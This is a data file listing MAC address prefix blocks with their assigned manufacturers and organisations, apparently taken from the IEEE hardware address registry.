1007236 ESTONE TECHNOLOGY INC B8D8125 XIAMEN XINDECO LTD. B8D8123 iModesty Technology Corp. 74E14A8 aritec gmbh 74E14AA AStar Design Service Technologies Co., Ltd. E4956E9 eZeLink LLC B01F815 SHENZHEN GRID TECHNOLOGY CO.,LTD B01F812 Private B01F813 Sound United 58FCDBB SWARCO TRAFFIC SYSTEMS GMBH BC6641E Lucent Trans Electronics Co., Ltd BC6641C Shenzhen Crave Communication Co.,ltd BC6641B Sidus Novum Sp. z o. o. BC66417 VSN Mobil B01F81D TAIWAN Anjie Electronics Co.,Ltd. 58FCDBA Xmodus Systems GmbH 141FBA1 GloQuad F40E117 Shenzhen Grandsun Electronic Co.,Ltd. F40E11E Elektronika Naglic d.o.o. F40E11C NIHON MEGA LOGIC CO.,LTD. 141FBAC Swiss Electronic (Shenzhen) Co., Ltd 141FBA8 Shenzhen CATIC Information Technology Industry Co.,Ltd 141FBAA Winsonic Electronics Co., Ltd. F40E115 E-SONG F40E113 Shenzhen headsun technology 7C70BCA Motec GmbH 7C70BC1 XD-GE Automation CO.,LTD BC3400C Parlay Labs dba Highfive A43BFAA Plus One Japan Ltd. A43BFAC SHANGHAI XIETONG TECHNOLOGY INC. A43BFAB ALSTOM Strongwish (Shenzhen) Co., Ltd A43BFAE The Magstim Company Ltd. BC34001 IPLINK Technology Corp A43BFA2 Powell Industries D07650B PelKorea D07650A InventDesign D076507 ENCORED Technologies, Inc. D076501 DAIKEN AUTOMACAO LTDA 7419F83 Essential Trading Systems Corp 7419F81 Trend-tech Technology Co., Limited 7419F84 Cloudvue Technologies Corporation 90F421C ACOBA B0FF729 JIUYEE?shenzhen) Medical Technology Co.,Ltd 90F421E Velan Studios Inc. B0FF727 BL Innovare B0FF72D TBB Renewable (Xiamen) Co Ltd B0FF72E HANNING & KAHL GmbH & Co. KG BC31988 Temposonics,LLC BC31984 Chongqing e-skybest ELECT CO.,LIMITED 8C476E7 Syng, Inc. C86BBC8 Sinsegye Beijing Technology Co., Ltd BC31986 ntc mekhanotronnika D09FD93 GS Yuasa International Ltd. C86BBC1 WeLink Solutions, Inc. C86BBC5 Shenzhen Hebang Electronic Co., Ltd 58C41E4 BEIJING FIBRLINK COMMUNICATIONS CO.,LTD. 58C41EA GeBE Elektronik und Feinwerktechnik GmbH 50482C5 Bluefin International Inc 50482C0 Landatel Comunicaciones SL D015BBC Shenzhen Waystar Communication Technology Co. Ltd. D015BB2 Beijing Guangshu Zhiying Technology Development Co., Ltd. D015BB7 New Tech IoT D015BBA HONG KONG COHONEST TECHNOLOGY LIMITED 88A6EFB Beijing ThinRedline Technology Co.,Ltd. 88A6EFC Shenzhen C & D Electronics Co., Ltd. 80E4DAF Private 6C2ADF2 DAIKO ELECTRIC CO.,LTD FC61791 Signalinks Communication Technology Co., Ltd 6C2ADF7 RootV 7006925 CANAAN CREATIVE CO.,LTD. 7006920 Techology, LLC 7006923 BOSSCCTV CO., LTD 800A80F Private 54083B0 Shenzhen Liandian Communication Technology Co.LTD 54083B8 Update Systems Inc. 2C6A6FF Private B8D812F Private D016F04 BEIJING XIAOYUAN WENHUA CULTURE COMMUNICATION CO., LTD. D016F01 QBIC COMMUNICATIONS DMCC D016F0B worldcns inc. 6015927 Unipi Technology s.r.o. E03C1C9 Ocamar Technologies (Shanghai) Co.,Ltd. A0BB3EF Private 2C265FF Private 90C682F Private D093953 Nesecure Telecom Pvt Ltd D093958 Annapurna labs 5C6AEC6 FEMTOCELL 5C6AECA Shenzhen Olax Technology CO.,Ltd 7C45F9A qiio AG 7C45F93 Hangzhou LUXAR Technologies Co., Ltd 7C45F9B IngDan China-chip Electronic Technology(Wuxi) Co.,Ltd. C0EAC3E Beijing Zhongyuanyishang Technology Co Ltd 7C45F90 SENSeOR 8C5DB24 CoreTigo C0EAC34 Tokoz a.s. C0EAC32 NEXSEC Incorporated C0EAC3C Trumeter 8C5DB23 Yuzhou Zhongnan lnformation Technology Co.,Ltd 705A6F5 Acer Connect 705A6F7 WiBASE Industrial Solutions Inc. 8C5DB27 Cleartex s.r.o. C4A5590 Archermind Japan Co.,Ltd. C4A559C ALTAM SYSTEMS SL C4A5599 Shenzhen Meishifu Technology Co.,Ltd. 84B386A Velocio Networks, Inc. 84B386E NINGBO XINSUAN TECHNOLOGY CO.,LTD 84B3868 NetworX 0CCC47D GODOX Photo Equipment Co., Ltd. 0CCC476 Annapurna labs 0CCC472 Sun Yan International Trading Ltd. 0CCC47B Spot AI, Inc. 0CCC47C KUMI ELECTRONIC COMPONENTS 0CCC47A Rich Source Precision IND., Co., LTD. 0CCC475 DMECOM TELECOM CO.,LTD. F0221D2 Chonel Industry?shanghai?Co., Ltd. D461377 Beijing Shudun Information Technology Co., Ltd D461374 Beijing TAIXINYUN Technology Co.,Ltd 4C74A7B traplinked Gmbh A0024A5 Dongguan Amsamotion Automation Technology Co., Ltd F0221DA Hangzhou Gold Electronic Equipment Co., Ltd D461379 Private 4C74A7E KYOCERA CORPORATION 4C74A76 ABB LV Installation Materials Co., Ltd. Beijing 4C74A72 Cyanview D09686C ECS s.r.l. D09686E withnetworks D09686D CertusNet Information Technology Co.,LTD D096862 TMLake Technology Ltd., 4C74A75 AGILITY ROBOTICS, INC. 4C74A71 Shenzhen Hollyland Technology Co.,Ltd D096867 Private C498947 Shenzhen C & D Electronics Co., Ltd. D420006 HiAR Information Technology Co.,Ltd C483721 Shenzhen King Will Technology Co., LTD D4BABA7 Shenzhen Double Better Technology Co., Ltd D4BABA0 SHENZHEN ACTION TECHNOLOGIES CO., LTD. D4BABA2 GuangZhou Ostec Electronic Technology Co.,Limited D4BABA6 Shenzhen Yueer Innovation Technology Co., Ltd D4BABAB Qingdao Vzense Technology Co., Ltd. D4BABAA Actiontec Electronics Inc. C49894D Jiangsu AIDriving Co.,Ltd. D4BABAE Camozzi Automation SpA C498945 shenzhen lanodo technology Co., Ltd C48372A VIE STYLE,INC, C483720 Compumedics Germany GmbH D420005 Monolith Electric?Changzhou?Co.,Ltd. 5847CAE AZURE SUMMIT TECHNOLOGY 5847CA3 Fujian Helios Technologies Co., Ltd. 5847CA6 Shenzhen C & D Electronics Co., Ltd. 5847CA9 Kingnuo Intelligent Technology (Jiaxing) Co., Ltd. D420009 WEATHEX CO., LTD. E87829B Ampner Ltd D420003 Arbe Robotics Ltd. 1874E24 Aggressive Electronics Manufacturing Services Pvt Limited 883CC52 NETGEN HITECH SOLUTIONS LLP 301F9A9 Deep Sentinel 18C3F41 Enertex Bayern GmbH 18C3F43 General Test Systems 10DCB61 Hitachi Energy Switzerland Ltd 18C3F48 Shenzhen Liandian Communication Technology Co.LTD 883CC55 Shanghai Ucan Automation Equipment Co., Ltd. 883CC53 shenzhen Feng Jing Sheng Electronics Technology Co.,Ltd 18C3F45 Synaptics, Inc 303D518 The Heil Co dba AWTI 3rd Eye Cam FC6179B Fulian Precision Electronics(Tianjin) Co., Ltd 2C691D5 LG Electronics Inc. FC6179A Shenzhen Dptek Technology Co., Ltd. 303D51D XOR UK Corporation Limited C0D391B Celliber Technologies Pvt Limited 8C51098 nerospec 8C5109D Surpedia Technologies Co., Ltd. 8C51096 Avxav Electronic Trading LLC 0C7FED7 Grandway Technology (Shenzhen) Limited 0C7FEDC Shenzhen MoreSense Technology Co., Ltd. 8C5109E IROOTELLUCKY Corp. 0C7FED1 Toast, Inc. 0C7FEDB TelX Systems 8C51093 SHENZHEN LDROBOT CO., LTD. FC6179D Int'Act Pty Ltd 8002F47 Lazer Safe Pty Ltd 8002F42 Beijing Cybercore 8002F48 Annapurna labs 7050E7A Guangzhou Tianhe High Tech Industrial Development Zone Zhongsheng Electrical Limited Company 7050E79 Elastics.cloud 7050E72 Electronic's Time SRL 7050E73 Skychers Creations ShenZhen Limited C4A10EE Alio, Inc 7050E77 Yoctopuce 7050E75 Wall Box Chargers, S.L. 244E7B6 Owasys Advanced Wireless Devices C4A10E9 XI'AN YEP TELECOM TECHNOLOGY CO.,LTD 6C1524A STERIS C4A10E6 Hainan World Electronic Science and Techology Co.,Ltd C4A10EA Jiangsu Perceive World Technology Co.,Ltd. 1C5974A Council Rock 381F266 NOITAC sp. z o.o. sp.k. 381F267 RCE systems s.r.o. 381F26B Deutronic Elektronik GmbH 381F26A Sercomm Corporation. 381F260 JAESUNG INFORMATION & COMMUNICATION CO.LTD 18A59C1 Cuman 381F26E Annapurna labs 6C93082 ZHEJIANG XIAN DA Environmental Technology Co., Ltd 3043D78 Kesu (Shanghai) Electronic Technology Co., Ltd 3043D7A Bodhi 3043D79 PK Solutions LLC 3043D7B Motec GmbH 3043D74 FIBERME COMMUNICATIONS LLC 1054D26 Lanao Communication Technology Limited 1054D28 Annapurna labs 988FE0E CEL Terminus (Shanghai) Information Technologies Co.,Ltd. 6C93088 Hangzhou Risco System Co.,Ltd 6C93086 Uconfree technology(shenzhen)limited 6C93087 Liberty AV Solutions 0C86293 Annapurna labs 0C86294 Ag Express Electronics 0826AEE Mass Electronics Pty Ltd 0826AED Veth Propulsion bv 988FE07 China Huaxin Post and Telecom Technologies Co., Ltd. 18D7932 Hydrotechnik GmbH DC36438 OAK INFORMATION SYSTEM CO. DC3643A KUANTECH (CAMBODIA) CORPORATION LIMITED 04EEE88 MPEON Co.,Ltd DC3643C Orlaco Products B.V. 18D7937 JFA Electronics Industry and Commerce EIRELI 18D7935 DongGuan Orient Electronics & Metal Co.,Ltd 08F80DE Suzhou Sidi Information Technology Co., Ltd. 04EEE8A Shenzhen JoiningFree Technology Co.,Ltd 08F80D1 Shenzhen DophiGo IoT Technology Co.,Ltd 08F80D8 OpenYard LLC 1845B37 Shenzhen Incar Technology Co., Ltd. F4A4542 TRI WORKS F4A4543 Chongqing Hengxun Liansheng Industrial Co.,Ltd F4700CB Shanghai Risingpo Electronics CO.,LTD F4700C4 Shenzhen Anycon Electronics Technology Co.,Ltd F4700CE Shenzhen WeProTalk Technology Co., Ltd. F4A4546 Introl Design F4A4540 NKT Photonics A/S 7872644 Asustor Inc. 7872647 Conjing Networks Inc. F4700C0 HYUNSUNG CONVERGENCE 9880BBD Wyebot, Inc. 9880BB3 Annapurna labs 787264A Typhoon HIL, Inc. 986EE85 SUZHOU AUDITORYWORKS CO., LTD. 986EE8D Changzhou Jiahao Radio&TV device CO.,LTD 9880BBC Shenzhen Xin Kingbrand Enterprises Co., Ltd 986EE87 Centro de Pesquisas Av Wernher Von Braun 1CAE3E9 China Convert Technology Co., Ltd. 7C83349 SERNET (SUZHOU) TECHNOLOGIES CORPORATION A0BB3E4 COMSYS Communications Systems Service GmbH 7C83343 Beijing Changkun Technology Co., Ltd. 38A8CDD Annapurna labs 38A8CD1 Fujica System Co., ltd 7C8334D MSV elektronika s.r.o. 785EE8D Tachyon Networks 7C83347 ChengDU Yi Gong Intelligence Technology Co., Ltd. 283613E EGMedical, s.r.o. 283613B Qorvo, Inc. 785EE8C FINETOOLING TECHNOLOGY(HONG KONG)CO.,LIMITED 785EE84 beijing Areospace Hongda optoelectronics technology co.,ltd 2836135 Turing Video 2836138 Fuzhou Lesi Intelligent Technology Co., Ltd 283613C midBit Technologies, LLC 283613A MAKEEN Energy 6433B56 MICROIT SRL 6433B59 Annapurna labs 6433B58 LACO Technologies 6433B5B electroCore Inc. 6433B54 Eagle Eye Networks, Inc 44A92C7 Efficient Building Automation Corp. 6433B57 ABB Electrification Smart Power (ELSP) 584849A Waoo 44A92C1 uimcom A85B361 PARMA LLC F02A2B8 Tenways Engineering Service Ltd 44A92C4 NetX Networks a.s. F02A2BE Shenzhen CUCO Technology Co., Ltd 7813059 Shenzhen C & D Electronics Co., Ltd. A85B36D Adam Hall GmbH 781305E Dongguan zhenxing electronic technology co.,limited E878295 SHEN ZHEN SKYSI WISDOM TECHNOLOGY CO.,LTD. E878292 Galcon E878299 Ryu Tech. LTD E87829C FairPhone B.V. 1874E20 Ensor AG 1874E23 CT Company D09FD9B Cablewireless Laboratory Co., Ltd D09FD92 Westar Display Technologies 1874E27 Sansec Technology Co.,Ltd C0FBF94 Minato Advanced Technologies inc C0FBF97 LongSung Technology (Shanghai) Co.,Ltd. C8F5D6E HEITEC AG C8F5D6A HENAN FOXSTAR DIGITAL DISPLAY Co.,Ltd. C8F5D60 MEIRYO TECHNICA CORPORATION 88C9B36 Hugo Techno C0FBF99 zxsolution C0FBF90 Xerox Corporation 78C2C06 Sichuan Tianyi Comheart Telecom Co.,LTD 88C9B3C Shenzhen Viewsmart Technology Co.,Ltd 88C9B39 Richbeam (Beijing) Technology Co., Ltd. 88C9B33 Fortive Setra-ICG(Tianjin)Co.,Ltd 1CA0EF5 Nanjing Bilin Intelligent Identification Technology Co.,Ltd 1CA0EF2 Schneider-Electric(China)Co.Ltd,Shenzhen Branch 1CA0EFE RDA Microelectronics Technologies (Shanghai) Co. , Ltd 20CE2A3 Cuculus GmbH 20CE2A4 Annapurna labs 20CE2A6 Radarxense BV 20CE2A0 Annapurna labs 0C5CB5D BSU Inc 1CA0EF9 Atlas Aerospace 1CA0EFB BMK professional electronics GmbH 0C5CB5A Zhengzhou coal machinery hydraulic electric control Co.,Ltd 1CA0EFA Henrich Electronics Corporation 245DFCA Tata Sky Limited 245DFC3 Shenzhen Hailuck Electronic Technology CO.,LTD 6015928 Yangzhou Wanfang Electronic Technology,CO .,Ltd. A453EE6 Shenzhen Xunqi Interconnet Technology Co., Ltd 6015926 BEIJING KUANGSHI TECHNOLOGY CO., LTD 245DFCB ONLY 982782E SureFlap Ltd 982782C KRISTECH Krzysztof Kajstura 9827821 INFODAS GmbH 9827822 Anhui Shengren Electronic Technology Co., Ltd E86CC7B MORNSUN Guangzhou Science & Technology Co., Ltd. E86CC71 ASSA ABLOY(GuangZhou) Smart Technology Co., Ltd 0411194 Bolicom Innovation Technology (BeiJing) Co.,LTD. 041119C Haerbin Donglin Technology Co., Ltd. 0411195 CEITA COMMUNICATION TECHNOLOGY CO.,LTD 0411196 ZPD technology Co., Ltd 446FD8E CTE 446FD82 BAYKON Endüstriyel Kontrol Sistemleri San. ve Tic. A.Ş. 446FD87 ITC A0024AA Guangdong Jinpeng Technology Co. LTD 78D4F1B Jiangsu byzoro intelligent technology Co.,Ltd 78D4F11 Silla Industries A0024AC Encroute AB A0024A1 Vitec Imaging Solutions Spa A0024A8 Beijing Lyratone Technology Co., Ltd A453EEB Viper Design, LLC A0024A7 ENNEBI ELETTRONICA SRL 8C476EB Faravid Communication&Data Analysis 8C476E1 TelWare Corporation 8CAE49B Suzhou Guowang Electronics Technology Co., Ltd. 8C476EE Annapurna labs 8C476EC Edge Networks Inc 8CAE490 Ouman Oy 8CAE494 Jiangsu Sixingda Information Technology Co., Ltd. 6879128 ShangHai Aigentoo Information Technology Co., Ltd 6879123 Stephan Electronics SARL 6879120 PCTEL, Inc. 6879126 APPOTRONICS CO., LTD A03E6B0 s&t embedded GmbH 8411C2C Provision-ISR 8C476E3 Shanghai Satellite Communication Technology Co.,Ltd 8411C25 AIBIoT GmbH 8C476E5 Square Inc. 8C476E4 Shenzhen Juding Electronics Co., Ltd. 8411C2D Goldmund Switzerland 8411C27 Ei3 Corporation 5895D85 elgris UG 5895D81 shenzhen UDD Technologies,co.,Ltd DC4A9EB Maxvision Technology Corp. FCCD2F4 Genitek Engineering sprl DC4A9E2 Annapurna labs CC4F5C3 Shanghai Zenchant Electornics Co.,LTD CC4F5C9 Dtrovision CC4F5CD Beijing Neutron Technology CO.,LTD. FCCD2F1 Siren Care(Shanghai) information and technology company FCCD2FD Shenzhen Smartbyte Technology Co., Ltd. CC4F5CE Beijing Techao Weijia Technology Limited CC4F5CA AZ-TECHNOLOGY SDN BHD FCCD2F3 Xmitech Technology Co., Limited 98FC841 go-e GmbH 98FC846 ZERONE CO., LTD. 18FDCB7 ENERGIE IP 18FDCB0 Shenzhen Rui jiali Electronic Technology Co. Ltd. 58208A8 SAMIL CTS Co., Ltd. 98FC845 Zymbit 18FDCB9 CreyNox GmbH 18FDCBB TRANSLITE GLOBAL LLC 4C93A6A Hanwang Technology Co.,Ltd C0619A3 LYAND ACOUSTIC TECHNOLOGY CO.,LTD. C0619AE Zhejiang Haikang Science And Technology Co.,Ltd C0619A0 Paragon Robotics LLC 28B77C6 Shanghai Taiji Software Co.,Limited 28B77CD Enedo Finland Oy C0619AC JAM-Labs Corp 28B77CC AnyLink LLC C0619A1 KidKraft F469D5D Nantong ZYDZ Electronic.,Co.Ltd 5C857EE Guoyi Liangzi (Hefei) Technology Co., Ltd(CIQTEK) F469D54 Stype CS d.o.o. E4956EC Shenzhen Arronna Telecom Co.,Ltd 304950E IoTmaxx GmbH D01411D Guangdong Shiqi Manufacture Co., Ltd. D014116 Ahnnet 5C857E9 Express LUCK Industrial Ltd. 1C88791 ANDRA Sp. z o. o. 94FBA7D Rosenberger Technologies Co.,Ltd. F0D7AF8 SHEN ZHEN MICHIP TECHNOLOGIES CO.,LTD. F0D7AF4 ADAM Audio GmbH F0D7AF6 Anord Mardix (USA) Inc. 3049500 Guangzhou Lian-med Technology Co.,Ltd. 480BB2E Beijing MFOX technology Co., Ltd. CCC261D Dspread Technology (Beijing) Inc. CCC2615 Viper Design, LLC 38F7CDC Shenzhen MADIGI Electronic Technology Co., Ltd 38F7CD8 BlastWave Inc. 38F7CD4 NORDI TELEKOMMUNIKATSIOONI OÜ 38F7CD5 Shanghai qinzhuo Electronic Co., Ltd. 3CFAD36 Nox Medical 38F7CD9 RFbeam Microwave GmbH CCC2610 Ebiologic Technology Co., Ltd. CCC2619 BYTERG LLC 7069796 Beijing Security Union Information Technology Co.,Ltd 7069797 Intelitech SIA 7069799 Faurecia Clarion Electronics (Dongguan) Co., Ltd E8B470E UNICACCES GROUPE E8B470B Digifocus Technology Inc. 94FBA78 Silver-I Co.,LTD. E8B4701 Autocom Diagnostic Partner AB F490CB2 ICE Gateway GmbH 848BCD3 Annapurna labs C09BF48 SHENZHEN WINS ELECTRONIC TECHNOLOGY CO., LTD F490CB1 DELEM BV C09BF42 Hitachi High-Tech Materials Corporation DC44271 Tesla,Inc. 9405BBD Sunthink S&T Development Co.,Ltd 9405BB1 Dongguan Kingtron Electronics Tech Co., Ltd 9405BB3 Neutrik AG 94CC048 CircuitWerkes, Inc. 14AE85E Sercomm Corporation. 646266C Jiangsu Aisida Electronic Co.,Ltd 94CC040 Hangzhou Yongkong Technology Co., Ltd. 94CC047 Gowing Business And Contracting Wenzhou Co., LTD 9405BB4 Shenzhen Baolijie Technology Co., Ltd. 94CC044 ProConnections, Inc. 14AE856 TMG TE GmbH 14AE85C IO Industries Inc. 14AE855 AZ-TECHNOLOGY SDN BHD 90E2FCA Power Engineering & Manufacturing, Inc. 90E2FC6 Sindoh Techno Co., Ltd. 90E2FC3 Shenzhen Hisource Technology Development CO.,Ltd. 90E2FC5 TOTALONE TECHNOLOGY CO., LTD. 90E2FC1 Yite technology 14AE854 CENTERVUE SPA B0B3536 Hangzhou Hikrobot Technology Co., Ltd. B0B3533 AD HOC DEVELOPMENTS S.L B0B3538 VOXISCOM 14AE853 IFLYTEK CO.,LTD. 90E2FCE DevCom spol. s r.o. 90E2FC7 Fair Winds Digital srl 14AE85B NTC SOFT 50DE196 OCEANCCTV LTD B0B3534 Innotas Elektronik GmbH B0B3531 Sprocomm Technologies CO.,LTD. 3CFAD3E Mirico 402C76E LS Energy Solutions 50DE198 IVATIV, INC A0224EB All Inspire Health Inc. 200A0D4 Virtium 200A0D9 Welzek (Beijing) Technologies Co, Ltd 200A0D0 halstrup-walcher GmbH 402C76C gridX GmbH 0069675 Shenzhen Xiao Bi En Culture Education Technology Co.,Ltd. 0069670 Annapurna labs 0069673 Suzhou Radiant Lighting Technology Co.,Ltd A0224E5 Zhuhai Cheer Technology Co., LTD. A0224ED Digifocus Technology Inc. A0224E9 Delta Tau Data Systems, Inc. 643139E ATG UV Technology 8C147DC Reynaers Aluminium A0224E2 Closed Joint-Stock Company "NORSI-TRANS" 643139B Alphago GmbH C4954D5 Marble Automation 5062556 Shenzhen Sinway South Technology Co., Ltd 643139D ZHEJIANG MOORGEN INTELLIGENT TECHNOLOGY CO.,LTD 6431390 SHENZHEN EMEET INTELLIGENT TECHNOLOGY CO., LTD. 5062552 ShenZhen ChuangMo Electronics Technology Co., Ltd 4403778 Gemmy Electronics (Shenzhen) Co, Ltd 506255B CHENGDU COVE TECHNOLOGY CO.,LTD 5062554 XSLAB Inc. 4403779 SHENZHEN UT-KING TECHNOLOGY CO.,LTD 440377C BIG Climatic Manufacture, Co. LTD, Zhongshan Branch 54A4936 Hannto Technology Co., Ltd 10DCB69 Fuzhou Rockchip Electronics Co.,Ltd 54A4932 genua GmbH 04D16EB National Radio & Telecommunication Corporation - NRTC 04D16E6 ETL Elektrotechnik Lauter GmbH 04D16E3 Beijing Huaxia Qixin Technology Co., Ltd. 04D16EA Metra Electronics 54A493C BJ COTYTECH TECHNOLOGY CO.,LTD 04D16E0 INTRIPLE, a.s. 10DCB6B Eyeball Fintech Company 10DCB6D LeoLabs 10DCB63 HANACNS 4C4BF99 Tecnoplus Srl 10DCB65 Milesight Taiwan 4011756 ShenZhen LanShuo Communication Equipment CO.,LTD. 2085937 Great Lite International 9806372 Summa nv 980637E Shanghai Jinnian information technology Co. Ltd 2415104 Annapurna labs 44D5F2E Joint-Stock Company Research and Development Center "ELVEES" 44D5F29 Auctus Technologies Co.,Ltd. 44D5F27 Shenzhen Qiutian Technology Co.,Ltd 44D5F2C neocontrol soluções em automação D05F647 Beijing Core Shield Group Co., Ltd. FCA47A1 Shenzhen VMAX New Energy Co., Ltd. D05F641 Hangzhou ToupTek Photonics Co., Ltd. 2C16BDA Shenzhen Haiying Wire Tech Co., Ltd. 8C593C3 Chongqing beimoting technology co.ltd 8C593C0 Fujian Chaozhi Group Co., Ltd. 8C593C6 Qbic Technology Co., Ltd 8C593CD IDRO-ELETTRICA S.P.A. FCA47A3 Cliptech Industria e Comercio Ltda 2C16BD8 Shenzhen elink smart Co., ltd B4A2EB4 Softel SA de CV 6095CE5 AdvanWISE Corporation D0C8571 DALI A/S BC97408 Gaodi Rus D0C857B CHUNGHSIN INTERNATIONAL ELECTRONICS CO.,LTD. BC9740B ForoTel 848BCDA Sphera Telecom 848BCDD ENGISAT LDA B0FD0B4 Fasii Information Technology (Shanghai) Ltd. B0FD0B0 TAE HYUNG Industrial Electronics Co., Ltd. 848BCDE Emotiv Inc 848BCD7 Smart Code (Shenzhen) Technology Co.,Ltd 848BCD8 Dunst tronic GmbH C863147 Shenzhen Wesion Technology Co., Ltd C863144 Shenzhen Zero Zero Infinity Technology Co.,Ltd. C86314D Telematix AG 34E1D1E Annapurna labs C863146 GRINBI PARTNERS C863143 TrackMan E41E0AD ROMO Wind A/S E41E0AE Shanghai LeXiang Technology Co., Ltd E41E0AC TELETASK BELGIUM C82C2B0 Fungible, Inc. C82C2BA Shiftall Inc. C82C2B9 BIOT Sp. z o.o. B0FD0BD Habana Labs LTD FCD2B68 Oviss Labs Inc. FCD2B65 Grandway Technology (Shenzhen) Limited FCD2B60 CG POWER AND INDUSTRIAL SOLUTIONS LTD 34E1D10 Tianjin Sublue Ocean Science & Technology Co., Ltd 34E1D12 Teton Camera LLC 34E1D15 Doki Technologies Limited FCD2B6B T CHIP DIGITAL TECHNOLOGY CO.LTD E44CC7E FLK information security technology Co,. Ltd E44CC78 IAG GROUP LTD 745BC58 EDOMO Systems GmbH 4CBC986 Humanplus Intelligent Robotics Technology Co.,Ltd. 745BC54 uGrid Network Inc. E44CC7A Muzik Inc 4CBC98C Heliotis AG 4CBC989 Airtex Manufacturing Partnership 4CBC987 Voegtlin Instruments GmbH 4C65A8B ZMIN Technologies 38B19E1 Freedompro Srl E05A9F2 Chengdu Song Yuan Electronic Technology Co.,Ltd E05A9FA Contemporary Amperex Technology Co., Limited E05A9F0 Annapurna labs E05A9FD Mountz, Inc. D8860B1 Krspace E05A9F5 TRYEN D425CC5 bvk technology D425CCC POSNET Polska S.A. D425CC2 MusicLens Inc. D425CC8 DOLBY LABORATORIES, INC. D425CC7 BlueCats US, LLC CCD39D1 Evoko Unlimited AB 38B19E9 Doepke Schaltgeräte GmbH 38B19E7 Beijing Memblaze Technology Co Ltd 283638C Swisson AG CCD39DA Lubelskie Fabryki Wag FAWAG S.A. 9C69B41 EA Technology Ltd 4C917AE Annapurna labs 4C917AA Erlab DFS SAS 9C69B4D "Intellect module" LLC 6891D04 G-TECH Instruments Inc. 4C917AB AvertX 7CBC84B Guangzhou Puppyrobot Technology Co.Ltd Beijing Branch 7CBC849 HITIQ LIMITED 7CBC84C Tibit Communications 7CBC842 3S Technology Co., Ltd. 7CBC840 AG Neovo 7CBC844 CONTINENTAL 6CDFFB0 Shenzhen HDCVT Technology 6CDFFB2 Sercomm Corporation. 98F9C73 Beijing Horizon Information Technology Co., Ltd 9C431E2 HAESUNG DS 0CFE5DD Maksat Technologies P Ltd 98F9C7C ShenZhen Chuangwei Electronic Appliance Co.,Ltd 98F9C7B HIROIA Communications Pte. Ltd. Taiwan Branch 0CFE5D1 Fender Musical Instrument 0CFE5D9 Celerway Communication AS 0CFE5DB YINUO-LINK LIMITED 6C5C3D3 KWONG MING ELECTRICAL MANUFACTORY LIMITED 1CFD08E MESHBOX FOUNDATION PTE. LTD. 1CFD08D Tianjin Keyvia Electric Co.,Ltd 1CFD08A Banmak Technogies Co.,Ltd 1CFD081 Shenzhen SEWO Technology Co.,Ltd. 1CFD08C Shanghai YottaTech Co Ltd (上海尧它科技有限公司) 6C5C3D2 Vertiv Industrial Systems A83FA15 Sercomm Corporation. A83FA10 Imecon Engineering SrL 300A604 AVIC JONHON OPTRONIC TECHNOLOGY CO., LTD. 300A608 Bronkhorst High-Tech BV 3C6A2C9 WICKS Co., Ltd. A83FA19 Shenzhen ITLONG Intelligent Technology Co.,Ltd A02833E Precision Planting, LLC. A4ED432 Shanghai Mission Information Technologies (Group) Co.,Ltd A4ED43B Paragon Business Solutions Ltd. A4ED430 Sweam AB A02833B FlexLink AB 6891D03 Ambitio LLC D47C444 Sammi Onformation Systems 9CF6DD6 Shenzhen Xtooltech Co., Ltd 8489EC3 Aerionics Inc. 3009F92 Beijing Netswift Technology Co.,Ltd. 3009F99 Bonraybio 3009F90 Hurray Cloud Technology Co., Ltd. 8489EC9 Shenzhen Xtooltech Co., Ltd 8489EC0 SmartGiant Technology 8489EC5 Zephyr Engineering, Inc. 04C3E60 DREAMKAS LLC 78C2C04 Ory Laboratory Co., Ltd. 9CF6DDD Foshan Synwit Technology Co.,Ltd. C083594 ANTS C083591 Gemvax Technology ,. Co.Ltd 3C427E8 UBTECH ROBOTICS CORP A0C5F20 Quantlab Financial, LLC 3C427EB Compal Electronics INC. 04C3E6C SHANTOU YINGSHENG IMPORT & EXPORT TRADING CO.,LTD. 3C427E6 Edit Srl B44BD6D ELLETA SOLUTIONS LTD B44BD65 ShenZhen Comstar Technology Company B44BD62 Shenzhen Cudy Technology Co., Ltd. A019B21 El Sewedy Electrometer Egypt S.A.E. A019B25 SZBROAD TECHNOLOGY (HK) CO.,LTMITED 2C48354 GEARTECH LTD 2C4835A Collatz+Trojan GmbH 8C1CDA9 Raychem RPG PVT. LTD. 8C1CDA8 ATOL LLC 8C1CDA1 GESAS GmbH 8C1CDA3 Structura Technology & Innovation 480BB21 BAJA ELECTRONICS TECHNOLOGY LIMITED 480BB2D M2Lab Ltd. 480BB20 Ridango AS 3C24F0E GETMOBIT LLC 3C24F0A Shenzhen Bestway Technology Co., Ltd 3C24F0C Authentico Technologies 0C73EB5 Husty M.Styczen J.Hupert Sp.J. 0C73EB0 Gemini Data Loggers (UK) Limited 8C1CDAB T+A elektroakustik GmbH & Co.KG 885FE86 Shenzhen Xin Kingbrand Enterprises Co.,Ltd 885FE80 Jungheinrich Norderstedt AG & Co. KG 885FE82 Opto Engineering 2CD1419 Beijing Hexing Chuangxiang Technology Co., Ltd. 885FE8A Lisle Design Ltd F041C89 Shenzhen Nufilo Electronic Technology Co., Ltd. F041C86 AED Engineering GmbH F041C87 Nanchang BlackShark Co.,Ltd. A4DA22E Quuppa Oy 88A9A77 kimura giken corporation 88A9A7E Impact Distribution 88A9A78 psb intralogistics GmbH 88A9A71 Solaredge LTD. 301F9A6 YiSheng technology co.,LTD 301F9AD OLIMEX Ltd DCE5335 Controls Inc C4FFBC0 Danego BV A4DA220 General Electric Company A4DA222 Wyze Labs Inc C4FFBC7 Critical Link 9C431EA ST Access Control System Corp. 282C028 Shenzhen Neoway Technology Co.,Ltd. 282C02E Capintec, Inc. 282C02D SHENZHEN DOMENOR TECHNOLOGY LLC 189BA54 Innominds Software Inc 282C021 Astronics AES 4048FDA Shenzhen Yifang Digital Technology Co., LTD. 3873EAB Shanghai ZoomSmart Technology Co., Ltd. F8B568D Solarius F8B5686 Package Guard, Inc EC9F0DE MAX Technologies 3873EA1 KingWay Information Co.,Ltd. EC9F0D3 Waverly Labs Inc. EC9F0D2 DRB Systems AC1DDF0 PiOctave Solutions Pvt Ltd AC1DDFE Duravit AG AC1DDFC Beijing Chunhong Technology Co., Ltd. 34D0B86 NumberFour AG 34D0B87 Shenzhen Rikomagic Tech Corp.,Ltd 741AE03 Philips Personal Health Solutions EC9F0DD SKS Control Oy 34D0B8E Kongqiguanjia (Beijing)Technology co.,ltd 34D0B81 Shenzhen Bao Lai Wei Intelligent Technology Co., L AC1DDF6 Shenzheng SenseTime Technology Co. Ltd 741AE0B SHEN ZHEN YINGJIACHUANG ELECTRONICS TECHNOLOGY CO.,LTD. CC22377 Shanghai Doit IOT Technology Co.,Ltd. CC22375 Beijing Safesoft Greatmaker Co.,ltd CC22370 MEDCOM sp. z o.o. CC22376 Siemens AG Austria 2C279EC WAYCOM Technology 